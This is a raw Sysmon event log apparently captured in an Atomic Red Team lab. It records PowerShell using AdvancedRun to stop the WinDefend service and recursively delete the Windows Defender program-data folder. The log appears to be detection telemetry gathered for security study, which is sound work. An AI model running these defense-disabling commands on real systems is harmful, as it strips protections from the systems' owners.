17:19:16.937{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-1F03-000000002702}21201092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Manag
ement.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003942436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003942185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.762{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003941248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:59.950{834264DD-EB03-61EA-1503-000000002702}6024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003941242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:59.839{834264DD-EB02-61EA-1403-000000002702}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:18:59.839ATTACKRANGE\Administrator 154100x80000000000000003940357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:58.407{834264DD-EB02-61EA-1303-000000002702}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® 
Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003939728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:23.826{834264DD-EADF-61EA-1003-000000002702}4456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003938891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:22.380{834264DD-EADE-61EA-0E03-000000002702}612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 
{if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003936523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:40.279{834264DD-EA78-61EA-FB02-000000002702}1396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003935686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:38.954{834264DD-EA76-61EA-F902-000000002702}424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003934851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:00.931{834264DD-EA50-61EA-F002-000000002702}5284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003934843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:00.819{834264DD-EA4F-61EA-EE02-000000002702}680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:16:31.571ATTACKRANGE\Administrator 23542300x80000000000000003934842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:16:00.819{834264DD-EA4F-61EA-EE02-000000002702}680ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000003933762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:59.401{834264DD-EA4F-61EA-ED02-000000002702}6104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003933343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:47.385{834264DD-EA43-61EA-EA02-000000002702}384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003932930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:27.667{834264DD-EA2F-61EA-E702-000000002702}4984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003928878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:39.600{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003928862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.475{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.475{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 